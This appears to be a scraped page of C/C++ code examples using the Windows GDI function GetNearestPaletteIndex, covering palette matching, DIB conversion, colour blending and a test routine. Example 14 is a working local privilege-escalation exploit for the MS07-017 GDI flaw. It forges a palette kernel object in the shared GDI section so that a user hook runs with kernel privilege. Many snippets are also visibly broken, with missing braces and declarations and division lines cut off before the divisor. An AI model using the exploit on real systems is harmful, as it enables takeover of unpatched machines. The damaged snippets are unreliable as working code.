Ejemplo n.º 1
/* null driver fallback implementation for GetNearestColor */
COLORREF nulldrv_GetNearestColor( PHYSDEV dev, COLORREF color )
    unsigned char spec_type;

    if (!(GetDeviceCaps( dev->hdc, RASTERCAPS ) & RC_PALETTE)) return color;

    spec_type = color >> 24;
    if (spec_type == 1 || spec_type == 2)
        /* we need logical palette for PALETTERGB and PALETTEINDEX colorrefs */
        UINT index;
        PALETTEENTRY entry;
        HPALETTE hpal = GetCurrentObject( dev->hdc, OBJ_PAL );

        if (!hpal) hpal = GetStockObject( DEFAULT_PALETTE );
        if (spec_type == 2) /* PALETTERGB */
            index = GetNearestPaletteIndex( hpal, color );
        else  /* PALETTEINDEX */
            index = LOWORD(color);

        if (!GetPaletteEntries( hpal, index, 1, &entry ))
            WARN("RGB(%x) : idx %d is out of bounds, assuming NULL\n", color, index );
            if (!GetPaletteEntries( hpal, 0, 1, &entry )) return CLR_INVALID;
        color = RGB( entry.peRed, entry.peGreen, entry.peBlue );
    return color & 0x00ffffff;
Ejemplo n.º 2
int	MDIORGB_GetMatchingColourInPalette (MIOWinInfoPtr pmInfo, OOTreal pmRed, 
					    OOTreal pmGreen, OOTreal pmBlue)
    int			myRed, myBlue, myGreen;
    COLORREF		myColour;
    PALETTEENTRY	myPaletteEntry;
    int			myClosestColour;
    myRed = (int) (pmRed * 255 + 0.5);
    myGreen = (int) (pmGreen * 255 + 0.5);
    myBlue = (int) (pmBlue * 255 + 0.5);
    myColour = RGB (myRed, myGreen, myBlue);
    myClosestColour = GetNearestPaletteIndex (pmInfo -> palette, myColour);
    if (GetPaletteEntries (pmInfo -> palette, myClosestColour, 1, 
    			   &myPaletteEntry) == 0)
    	return -1;
    if ((myRed == myPaletteEntry.peRed) &&
    	(myGreen == myPaletteEntry.peGreen) &&
    	(myBlue == myPaletteEntry.peBlue))
    	return myClosestColour;
    return -1;
} // MDIORGB_GetNearestColourInPalette
Ejemplo n.º 3
// Done by MAKEPAL which generates the pal.c sourcefile.
void CalcBlendBiXlat(HPALETTE hPalette, bixlat* pBiXlat, int partsFirst, int partsSecond)
	int i, j;

	if (!hPalette || !pBiXlat || partsFirst <= 0 || partsSecond <= 0)

	for (i = 0; i < NUM_COLORS; i++)
		GetPaletteEntries(hPalette, i, 1, &pe1);

		for (j = 0; j < NUM_COLORS; j++)
			PALETTEENTRY pe2, pe;
			LONG l;
			GetPaletteEntries(hPalette, j, 1, &pe2);

			l = (((LONG)pe1.peRed)*partsFirst + ((LONG)pe2.peRed)*partsSecond) /
			pe.peRed = (BYTE)(l & 0xFF);

			l = (((LONG)pe1.peGreen)*partsFirst + ((LONG)pe2.peGreen)*partsSecond) /
			pe.peGreen = (BYTE)(l & 0xFF);

			l = (((LONG)pe1.peBlue)*partsFirst + ((LONG)pe2.peBlue)*partsSecond) /
			pe.peBlue = (BYTE)(l & 0xFF);

			pBiXlat->entry[(i<<8)|(j)] = GetNearestPaletteIndex(hPalette, RGB(pe.peRed, pe.peGreen, pe.peBlue));
Ejemplo n.º 4
int	MDIORGB_GetNearestColourInPalette (MIOWinInfoPtr pmInfo, OOTreal pmRed, 
					   OOTreal pmGreen, OOTreal pmBlue)
    COLORREF	myColour = MyGetColourFromOOTRGB (pmRed, pmGreen, pmBlue);
    return GetNearestPaletteIndex (pmInfo -> palette, myColour);
} // MDIORGB_GetNearestColourInPalette
Ejemplo n.º 5
/* CalcBlendXlat:
 * Given a palette, writes all indices  of the xlat.
 * Each index is the best fit for the blend of a fixed color and the palette
 * color.  For a 20% golden blend, you'd give gold as the color to mix,
 * and 80 to 20 as the ratio partsFirst to partsSecond.
void CalcBlendXlat(HPALETTE hPalette, xlat* pXlat, COLORREF crMix, int partsFirst, int partsSecond)
	int i;

	if (!hPalette || !pXlat || partsFirst <= 0 || partsSecond <= 0)

	for (i = 0; i < NUM_COLORS; i++)
		LONG l;
		GetPaletteEntries(hPalette, i, 1, &pe);

		l = (((LONG)pe.peRed)*partsFirst + (LONG)GetRValue(crMix)*partsSecond) /
		pe.peRed = (BYTE)(l & 0xFF);

		l = (((LONG)pe.peGreen)*partsFirst + (LONG)GetGValue(crMix)*partsSecond) /
		pe.peGreen = (BYTE)(l & 0xFF);

		l = (((LONG)pe.peBlue)*partsFirst + (LONG)GetBValue(crMix)*partsSecond) /
		pe.peBlue = (BYTE)(l & 0xFF);

		pXlat->entry[i] = GetNearestPaletteIndex(hPalette, RGB(pe.peRed, pe.peGreen, pe.peBlue));
Ejemplo n.º 6
/* CalcFilterXlat:
 * Given a palette, writes all indices  of the xlat.
 * Each index is the best fit for the given color at the original palette
 * color's lightness.  For a golden filter, you'd give gold as the color.
void CalcFilterXlat(HPALETTE hPalette, xlat* pXlat, COLORREF crMix)
	int i;
	PALETTEENTRY pe; /* i want to be able to see it always in this function */

	if (!hPalette || !pXlat)

	for (i = 0; i < NUM_COLORS; i++)
		BYTE byLightness;
		LONG l;
		GetPaletteEntries(hPalette, i, 1, &pe);

		byLightness = GetRGBLightness(&pe);

		l = ((LONG)GetRValue(crMix))*((LONG)byLightness)/256;

		pe.peRed = (BYTE)(l & 0xFF);

		l = ((LONG)GetGValue(crMix))*((LONG)byLightness)/256;
		pe.peGreen = (BYTE)(l & 0xFF);

		l = ((LONG)GetBValue(crMix))*((LONG)byLightness)/256;
		pe.peBlue = (BYTE)(l & 0xFF);

		pXlat->entry[i] = GetNearestPaletteIndex(hPalette, RGB(pe.peRed, pe.peGreen, pe.peBlue));
Ejemplo n.º 7
int	MDIORGB_WhatDotColor (MIOWinInfoPtr pmInfo, int pmX, int pmY)
    COLORREF	myColour = GetPixel ((HDC) pmInfo -> offscreenDeviceContext, 
    				     pmX, pmY);
    return GetNearestPaletteIndex (pmInfo -> palette, myColour);
} // MDIORGB_WhatDotColor
Ejemplo n.º 8
uint QColormap::pixel(const QColor &color) const
    const QColor c = color.toRgb();
    COLORREF rgb = RGB(c.red(), c.green(), c.blue());
    if (d->hpal)
        return PALETTEINDEX(GetNearestPaletteIndex(d->hpal, rgb));
    return rgb;
Ejemplo n.º 9
// Map the colors of the DIB (using GetNearestPaletteIndex) to a palette
void CDib::MapToPalette( HPALETTE hpal )
	int n, nDibColors;
	LPBYTE lpBits;
	BYTE xlat[256];
	DWORD SizeImage;
	BOOL bChanged;

	if ( !hpal )

	if ( m_bmiHeader.biBitCount != 8 )

	if ( GetColorTableType() == DIB_PAL_COLORS )

	//	build a xlat table. from the current DIB colors to the given palette
	nDibColors = GetNumColors();
	lpRgb = GetColors();
	bChanged = NO;
	for ( n=0; n<nDibColors; n++ )
		xlat[n] = (BYTE)GetNearestPaletteIndex( hpal,
			RGB(lpRgb->rgbRed, lpRgb->rgbGreen, lpRgb->rgbBlue) );
		if ( xlat[n] != n )
			bChanged = YES;

	if ( !bChanged )
		// Now reset the DIB color table to match the palette
		SetColorTable( hpal, DIB_RGB_COLORS );

	// translate the DIB bits
	lpBits = (LPBYTE)GetPtr();
	SizeImage = GetSizeImage();
	switch (m_bmiHeader.biCompression)
		case BI_RLE8:
			xlatRle8(lpBits, SizeImage, xlat);

		case BI_RGB:
			xlatClut8(lpBits, SizeImage, xlat);

	// Now reset the DIB color table to match the palette
	SetColorTable( hpal, DIB_RGB_COLORS );
Ejemplo n.º 10
 * GetNearestColor [GDI32.@]
 * Gets a system color to match.
 *    Success: Color from system palette that corresponds to given color
 *    Failure: CLR_INVALID
    HDC hdc,      /* [in] Handle of device context */
    COLORREF color) /* [in] Color to be matched */
    unsigned char spec_type;
    COLORREF nearest;
    DC 		*dc;

    if (!(dc = get_dc_ptr( hdc ))) return CLR_INVALID;

    if (dc->funcs->pGetNearestColor)
        nearest = dc->funcs->pGetNearestColor( dc->physDev, color );
        release_dc_ptr( dc );
        return nearest;

    if (!(GetDeviceCaps(hdc, RASTERCAPS) & RC_PALETTE))
        release_dc_ptr( dc );
        return color;

    spec_type = color >> 24;
    if (spec_type == 1 || spec_type == 2)
        /* we need logical palette for PALETTERGB and PALETTEINDEX colorrefs */

        UINT index;
        PALETTEENTRY entry;
        HPALETTE hpal = dc->hPalette ? dc->hPalette : GetStockObject( DEFAULT_PALETTE );

        if (spec_type == 2) /* PALETTERGB */
            index = GetNearestPaletteIndex( hpal, color );
        else  /* PALETTEINDEX */
            index = LOWORD(color);

        if (!GetPaletteEntries( hpal, index, 1, &entry ))
            WARN("RGB(%x) : idx %d is out of bounds, assuming NULL\n", color, index );
            if (!GetPaletteEntries( hpal, 0, 1, &entry ))
                release_dc_ptr( dc );
                return CLR_INVALID;
        color = RGB( entry.peRed, entry.peGreen, entry.peBlue );
    nearest = color & 0x00ffffff;
    release_dc_ptr( dc );

    TRACE("(%06x): returning %06x\n", color, nearest );
    return nearest;
Ejemplo n.º 11
VOID vTestPal1(void)
    HPALETTE hpal1;
    UINT uiTemp;

    hpal1 = CreatePalette((LPLOGPALETTE) &logpalVGA);

    if (hpal1 == (HPALETTE) 0)
	DbgPrint("vTestPal1 failed to create palette\n");

    AnimatePalette(hpal1, 0, 100, NULL);
    SetPaletteEntries(hpal1, 0, 100, NULL);

    uiTemp = GetNearestPaletteIndex(hpal1, 0);

    if (uiTemp != 0)
	DbgPrint("GetNearestPaletteIndex failed 0 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, 0x00000080);

    if (uiTemp != 1)
	DbgPrint("GetNearestPaletteIndex failed 1 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, 0x00C0C0C0);

    if (uiTemp != 7)
	DbgPrint("GetNearestPaletteIndex failed 7 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, 0x0000FF00);

    if (uiTemp != 10)
	DbgPrint("GetNearestPaletteIndex failed 10 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, 0x00FFFFFF);

    if (uiTemp != 15)
	DbgPrint("GetNearestPaletteIndex failed 15 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, PALETTEINDEX(5));

    if (uiTemp != 5)
	DbgPrint("GetNearestPaletteIndex failed 15 %lx\n", uiTemp);

    uiTemp = GetNearestPaletteIndex(hpal1, PALETTEINDEX(10));

    if (uiTemp != 10)
	DbgPrint("GetNearestPaletteIndex failed 15 %lx\n", uiTemp);

    if (!DeleteObject(hpal1))
	DbgPrint("vTestPal1 failed to delete palette\n");
Ejemplo n.º 12
int CVisWindow::ColorRGB2I(float *Color)
	DWORD r = RGB((BYTE)(Color[0]*255),(BYTE)(Color[1]*255),(BYTE)(Color[2]*255)); 
	int   i = GetNearestPaletteIndex( hPal,r );
	return i;

//	return GetNearestPaletteIndex( hPal,
//		RGB((BYTE)(Color[0]*255),(BYTE)(Color[1]*255),(BYTE)(Color[2]*255))	); 
	int j,c,i,base;

	for(i=j=0; j<3; j++){
		if(Color[j]<0)      Color[j]=0;
		else if(Color[j]>1) Color[j]=1;
		c    = (int)( Color[j]*(IBASE-1) + .5 );
		i    += c*base;
		base *= IBASE;
	return i;
Ejemplo n.º 13
int ColorModel::alloc_color(color& c)
#ifdef MAC_OSX_TK
	int r = c.r;
	int g = c.g;
	int b = c.b;

	if (gamma_ != 1.) {
		r = int(256. * pow(r / 256., gamma_));
		g = int(256. * pow(g / 256., gamma_));
		b = int(256. * pow(b / 256., gamma_));
#ifndef WIN32
	if (r == g && r == b && (r & 7) == 0 && r > 0) {
		 * This color is one level away from the gray ramp
		 * used in nv, ghostscript, and the LBL-modified
		 * tk library.  Change it so we'll end up sharing
		 * the colormap entry.  The error won't be perceptible.
		 r -= 1;
		 g -= 1;
		 b -= 1;
	XColor xc;
	xc.red = r << 8;
	xc.green = g << 8;
	xc.blue = b << 8;
	if (XAllocColor(dpy_, colormap_, &xc) == 0) {
		return (-1);
#ifdef WIN32
	 * The current WinTk returns RGB values in the pixel. X returns
	 * a colormap index. So get the palette index and use that.
	TkWinColormap *cmap = (TkWinColormap *) colormap_;
	UINT index = GetNearestPaletteIndex(cmap->palette, PALETTERGB(r, g, b));
	int pixel = index;
	pixel_[index] = xc.pixel;
	color& p = colors_[ncolor_];
	if (++ncolor_ >= 256) {
		fprintf(stderr, "vic: colormap overflow (internal error)\n");

#if defined(WIN32) && (TCL_MAJOR_VERSION == 8) && (TCL_MINOR_VERSION == 0)
	if (!win32Colors)
		win32Colors = pixel_;
	win32NColors = ncolor_;

	int pixel = xc.pixel;
	pixel_[ncolor_] = pixel;
	if (++ncolor_ >= 256) {
		fprintf(stderr, "vic: colormap overflow (internal error)\n");
	color& p = colors_[pixel];
	p.r = xc.red >> 8;
	p.g = xc.green >> 8;
	p.b = xc.blue >> 8;

	/* XXX ed ditherer needs this */

	return (pixel);
#endif // MAC_OSX_TK
Ejemplo n.º 14
int main(int argc, char *argv[])
    HANDLE hPal;
    PVOID OriginalPalObject;
    PVOID FalsePalObject; 
    HANDLE hThread = GetCurrentThread();  
    DWORD OriginalThreadPriotity = GetThreadPriority (hThread);  
    HANDLE hSection = (ULONG)0;  
    PVOID MapFile = 0;
    WORD Pid = GetCurrentProcessId();                 
   	NtQuerySection = (NTQUERYSECTION)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtQuerySection");
    printf ("##########################################################\n");                
    printf ("# GDI Local Elevation of Privilege Vulnerability Exploit #\n");
    printf ("#        All Windows 2000/XP before MS07-017 patch       #\n");
    printf ("##########################################################\n");   
    printf ("# coded by Lionel d'Hauenens   http://www.labo-asso.com  #\n");
    printf ("##########################################################\n\n");                                     
    // Search handle section and mapper in virtual memory of user
    while ((DWORD)hSection<0xFFFF) 
        SectionInfo.Attributes = 0;  
        MapFile = MapViewOfFile((HANDLE)hSection, FILE_MAP_ALL_ACCESS, 0, 0, 0); 
        if (MapFile)
            if (SectionInfo.Attributes == SEC_COMMIT) break;  // For compatibility with win2k 
            MapFile = 0;

    if (!MapFile)
       printf ("Could not found shared section !\n");

    // Create Palette
    pLogPal = (PLOGPALETTE) calloc (sizeof(LOGPALETTE)+sizeof(PALETTEENTRY), 1);    
    pLogPal->palNumEntries = 1;
    pLogPal->palVersion = 0x300;
    hPal = (HANDLE)CreatePalette(pLogPal);  
    if (!hPal)
       printf ("Could not create palette !\n");
    // Search the entry of pal object 
    OriginalPalObject = (PVOID)0;        
    pGdiEntry = (PGDI_TABLE_ENTRY)MapFile;
    while ((DWORD)pGdiEntry < ((DWORD)MapFile) + SectionInfo.Size.QuadPart)
          if ( pGdiEntry->ProcessID == Pid  &&
                  pGdiEntry->nType == PAL_TYPE )
              // Save original pointer
              OriginalPalObject =  (PVOID)pGdiEntry->pKernelInfo;                          

    if (!OriginalPalObject)
       printf ("Could not find entry of Pal object !\n");
    // Create the false Pal object
    FalsePalObject                   = (PVOID) calloc(0x100/4,4);
    ((PDWORD)FalsePalObject)[0]      = (DWORD)hPal;   // Handle    
    ((PDWORD)FalsePalObject)[0x14/4] = (DWORD) 1;     // Availabled flag
    ((PVOID*)FalsePalObject)[0x3C/4] = (PVOID) &hook; // Interface GetNearestPaletteIndex 
    printf ("Section:\n--------\n");                                                             
    printf ("Handle: 0x%08X    Attributes: %08X    Size: 0x%08X\n\n", hSection
                                                                    , SectionInfo.Attributes
                                                                    , SectionInfo.Size.QuadPart);
    printf ("Pointer of original pal object: 0x%08X\n", OriginalPalObject); 
    printf ("Address of user map: 0x%08X\n", MapFile); 
    printf ("Pointer of false pal object: 0x%08X\n", FalsePalObject);  
    printf ("Entry of GDI palette in user view: 0x%08X\n", MapFile+((((ULONG)hPal) & 0xFFFF)*sizeof(GDI_TABLE_ENTRY)) );     
    printf ("Address of Hook(): 0x%08X\n\n", &hook);  

    printf ("->Test...");
    flag_test = 0;            
    SetThreadPriority (hThread, THREAD_PRIORITY_HIGHEST); 
         // Active false Pal object    
         pGdiEntry->pKernelInfo = FalsePalObject;   
              GetNearestPaletteIndex (hPal, 0); //--> call hook() with kernel privilege :);
         // Restore original Pal object
         pGdiEntry->pKernelInfo = OriginalPalObject; 
    SetThreadPriority (hThread,OriginalThreadPriotity);
    if (!flag_test) printf ("ERROR !!!\n");
    else printf ("OK :)\n");

    DeleteObject ((HANDLE)hPal);
    return (0);         
Ejemplo n.º 15
// Note we only support 8bpp DIBs here, and..
// there is no regard for color table matching between the DIBs
void CDib::DibBlt(PDIB pdibDst, int dstLeft, int dstTop, int dstWidth, int dstHeight,
				  int srcLeft, int srcTop, int srcWidth, int srcHeight,
				  BOOL bTransparent, LPRGBTRIPLE lpRGB, LPTR lpLut, HPALETTE hPal )
HPTR pSrc, pDst;
int iScanS, iScanD, iOverrun;

if ( !pdibDst )
if ( GetBitCount() != 8 )
if ( pdibDst->GetBitCount() != 8 )

// Check the coordinate bounds, to avoid an out of range pointer
if ( srcLeft < 0 )	{ dstLeft -= srcLeft; srcWidth	+= srcLeft; dstWidth  += srcLeft; srcLeft = 0; }
if ( srcTop	 < 0 )	{ dstTop  -= srcTop;  srcHeight += srcTop;	dstHeight += srcTop;  srcTop  = 0; }
if ( dstLeft < 0 )	{ srcLeft -= dstLeft; srcWidth	+= dstLeft; dstWidth  += dstLeft; dstLeft = 0; }
if ( dstTop	 < 0 )	{ srcTop  -= dstTop;  srcHeight += dstTop;	dstHeight += dstTop;  dstTop  = 0; }

if ( srcWidth <= 0 || srcHeight <= 0 || dstWidth <= 0 || dstHeight <= 0 )

if ( srcLeft - GetWidth()	   >= 0 )	return;
if ( srcTop	 - abs(GetHeight()) >= 0 )	return;
if ( dstLeft - pdibDst->GetWidth()		   >= 0 )	return;
if ( dstTop	 - abs(pdibDst->GetHeight()) >= 0 ) return;

if ( (iOverrun = srcLeft + srcWidth	 - GetWidth())		> 0 )	{ srcWidth	-= iOverrun; dstWidth  -= iOverrun; }
if ( (iOverrun = srcTop	 + srcHeight - abs(GetHeight())) > 0 )	{ srcHeight -= iOverrun; dstHeight -= iOverrun; }
if ( (iOverrun = dstLeft + dstWidth	 - pdibDst->GetWidth())		> 0 )	{ dstWidth	-= iOverrun; srcWidth  -= iOverrun; }
if ( (iOverrun = dstTop	 + dstHeight - abs(pdibDst->GetHeight())) > 0 ) { dstHeight -= iOverrun; srcHeight -= iOverrun; }

if ( srcWidth <= 0 || srcHeight <= 0 || dstWidth <= 0 || dstHeight <= 0 )

// Get pointers to the start points in the source and destination
if ( !(pSrc = GetXY( srcLeft, srcTop )) )
if ( !(pDst = pdibDst->GetXY( dstLeft, dstTop )) )

// Get the scan line widths of each DIB.
iScanS = GetWidthBytes();
iScanD = pdibDst->GetWidthBytes();

// Upside down DIBs have to move backwards
if ( GetHeight() > 0 )
	 iScanS = -iScanS;
if ( pdibDst->GetHeight() > 0 )
	 iScanD = -iScanD;

if ( !bTransparent )
	{ // Copy the lines.
	while ( --srcHeight >= 0 )
		hmemcpy( pDst, pSrc, srcWidth );
		pSrc += iScanS;
		pDst += iScanD;
if (lpRGB)
	{ // Copy lines with transparency mask
	WORD src, dst, wMini;
	BYTE dstPixel, srcColor, red, green, blue;
	int iSinc, iDinc, iCount;
	LPRGBQUAD pTable = GetColors();
	if (lpLut)
		wMini = RGB3toMiniRGB(lpRGB->rgbtRed, lpRGB->rgbtGreen, lpRGB->rgbtBlue);
		srcColor = lpLut[wMini];				
	if (hPal)
		srcColor = (BYTE)GetNearestPaletteIndex( hPal, RGB(lpRGB->rgbtRed, lpRGB->rgbtGreen, lpRGB->rgbtBlue) );
		srcColor = 0;

	iSinc = iScanS - srcWidth; // Source increment value
	iDinc = iScanD - srcWidth; // Destination increment value
	while ( --srcHeight >= 0 )
		iCount = srcWidth;	  // Number of pixels to scan.
		while ( --iCount >= 0 )
			src = (WORD)(*pSrc++);
			// Copy pixel only if it isn't transparent.
			if (src == 0)
			if (src == 255)
				*pDst++ = srcColor;
				if (src > 127)
				dst = 256-src;
				dstPixel = *pDst;
				red = (BYTE)((((WORD)lpRGB->rgbtRed * src) + ((WORD)pTable[dstPixel].rgbRed * dst)) >> 8);
				green = (BYTE)((((WORD)lpRGB->rgbtGreen * src) + ((WORD)pTable[dstPixel].rgbGreen * dst)) >> 8);
				blue = (BYTE)((((WORD)lpRGB->rgbtBlue * src) + ((WORD)pTable[dstPixel].rgbBlue * dst)) >> 8);
				if (lpLut)
					wMini = RGB3toMiniRGB(red, green, blue);
					*pDst++ = lpLut[wMini];					
				if (hPal)
					*pDst++ = (BYTE)GetNearestPaletteIndex( hPal, RGB(red, green, blue) );

		pSrc += iSinc;
		pDst += iDinc;
	{ // Copy lines with transparency.
Ejemplo n.º 16
HDIB DibConvert (HDIB hdibSrc, int iBitCountDst)
     HDIB         hdibDst ;
     HPALETTE     hPalette ;
     int          i, x, y, cx, cy, iBitCountSrc, cColors ;
     RGBQUAD      rgb ;
     WORD         wNumEntries ;

     cx = DibWidth (hdibSrc) ;
     cy = DibHeight (hdibSrc) ;
     iBitCountSrc = DibBitCount (hdibSrc) ;

     if (iBitCountSrc == iBitCountDst)
          return NULL ;

          // DIB with color table to DIB with larger color table:

     if ((iBitCountSrc < iBitCountDst) && (iBitCountDst <= 8))
          cColors = DibNumColors (hdibSrc) ;
          hdibDst = DibCreate (cx, cy, iBitCountDst, cColors) ;

          for (i = 0 ; i < cColors ; i++)
               DibGetColor (hdibSrc, i, &rgb) ;
               DibSetColor (hdibDst, i, &rgb) ;

          for (x = 0 ; x < cx ; x++)
          for (y = 0 ; y < cy ; y++)
               DibSetPixel (hdibDst, x, y, DibGetPixel (hdibSrc, x, y)) ;
          // Any DIB to DIB with no color table

     else if (iBitCountDst >= 16)
          hdibDst = DibCreate (cx, cy, iBitCountDst, 0) ;

          for (x = 0 ; x < cx ; x++)
          for (y = 0 ; y < cy ; y++)
               DibGetPixelColor (hdibSrc, x, y, &rgb) ;
               DibSetPixelColor (hdibDst, x, y, &rgb) ;
          // DIB with no color table to 8-bit DIB

     else if (iBitCountSrc >= 16 && iBitCountDst == 8)
          hPalette = DibPalMedianCut (hdibSrc, 6) ;

          GetObject (hPalette, sizeof (WORD), &wNumEntries) ;

          hdibDst = DibCreate (cx, cy, 8, wNumEntries) ;
          for (i = 0 ; i < (int) wNumEntries ; i++)
               GetPaletteEntries (hPalette, i, 1, &pe) ;

               rgb.rgbRed   = pe.peRed ;
               rgb.rgbGreen = pe.peGreen ;
               rgb.rgbBlue  = pe.peBlue ;
               rgb.rgbReserved = 0 ;

               DibSetColor (hdibDst, i, &rgb) ;

          for (x = 0 ; x < cx ; x++)
          for (y = 0 ; y < cy ; y++)
               DibGetPixelColor (hdibSrc, x, y, &rgb) ;

               DibSetPixel (hdibDst, x, y,
                    GetNearestPaletteIndex (hPalette, 
                         RGB (rgb.rgbRed, rgb.rgbGreen, rgb.rgbBlue))) ;
          DeleteObject (hPalette) ;
          // Any DIB to monochrome DIB

     else if (iBitCountDst == 1)
          hdibDst = DibCreate (cx, cy, 1, 0) ;
          hPalette = DibPalUniformGrays (2) ;

          for (i = 0 ; i < 2 ; i++)
               GetPaletteEntries (hPalette, i, 1, &pe) ;

               rgb.rgbRed   = pe.peRed ;
               rgb.rgbGreen = pe.peGreen ;
               rgb.rgbBlue  = pe.peBlue ;
               rgb.rgbReserved = 0 ;

               DibSetColor (hdibDst, i, &rgb) ;

          for (x = 0 ; x < cx ; x++)
          for (y = 0 ; y < cy ; y++)
               DibGetPixelColor (hdibSrc, x, y, &rgb) ;

               DibSetPixel (hdibDst, x, y,
                    GetNearestPaletteIndex (hPalette, 
                         RGB (rgb.rgbRed, rgb.rgbGreen, rgb.rgbBlue))) ;
          DeleteObject (hPalette) ;
          // All non-monochrome DIBs to 4-bit DIB

     else if (iBitCountSrc >= 8 && iBitCountDst == 4)
          hdibDst = DibCreate (cx, cy, 4, 0) ;
          hPalette = DibPalVga () ;

          for (i = 0 ; i < 16 ; i++)
               GetPaletteEntries (hPalette, i, 1, &pe) ;

               rgb.rgbRed   = pe.peRed ;
               rgb.rgbGreen = pe.peGreen ;
               rgb.rgbBlue  = pe.peBlue ;
               rgb.rgbReserved = 0 ;

               DibSetColor (hdibDst, i, &rgb) ;

          for (x = 0 ; x < cx ; x++)
          for (y = 0 ; y < cy ; y++)
               DibGetPixelColor (hdibSrc, x, y, &rgb) ;

               DibSetPixel (hdibDst, x, y,
                    GetNearestPaletteIndex (hPalette, 
                         RGB (rgb.rgbRed, rgb.rgbGreen, rgb.rgbBlue))) ;
          DeleteObject (hPalette) ;
          // Should not be necessary

          hdibDst = NULL ;

     return hdibDst ;
Ejemplo n.º 17
	int Count, i;
	int Width, Height;
	HDC hdcDesktop;
	HDC hdcMem;
	RECT rc;
	UINT index;
	HGDIOBJ hbmOld;
	BYTE gray;
	HWND hWnd;
	int x, y;

	Count = ImageList_GetImageCount(himlNormal);
	if (Count == 0) {
		return NULL;

	ImageList_GetIconSize(himlNormal, &Width, &Height);
	himlGray = ImageList_Create(Width, Height, ILC_COLOR24 | ILC_MASK, Count, 0);

	hdcDesktop = GetDC(NULL);
	hdcMem = CreateCompatibleDC(NULL);
	rc.top = rc.left = 0;
	rc.bottom = Height;
	rc.right = Width;
	crMask = RGB(200, 199, 200);

	if (GetDeviceCaps(hdcDesktop, BITSPIXEL) < 24) {
		hpal = (HPALETTE)GetCurrentObject(hdcDesktop, OBJ_PAL);
		index = GetNearestPaletteIndex(hpal, crMask);
		if (index != CLR_INVALID) { 
			crMask = PALETTEINDEX(index);

	for (i = 0 ; i < Count; ++i) {

		hbm = CreateCompatibleBitmap(hdcDesktop, Width, Height);
		hbmOld = SelectObject(hdcMem, hbm);

		SdkFillSolidRect(hdcMem, crMask, &rc);

		ImageList_SetBkColor(himlNormal, crMask);
		ImageList_Draw(himlNormal, i, hdcMem, 0, 0, ILD_NORMAL);

		for (x = 0 ; x < Width; ++x) {
			for (y = 0; y < Height; ++y) {
				rgb = GetPixel(hdcMem, x, y);
				if (rgb != crMask) { 
					gray = (BYTE) (95 + (GetRValue(rgb) * 3 + GetGValue(rgb) * 6 + GetBValue(rgb)) / 20);
					SetPixel(hdcMem, x, y, RGB(gray, gray, gray));

		hbm = SelectObject(hdcMem, hbmOld);
		ImageList_AddMasked(himlGray, (HBITMAP)hbm, crMask);

	hWnd = WindowFromDC(hdcDesktop);
	ReleaseDC(hWnd, hdcDesktop);

	return himlGray; 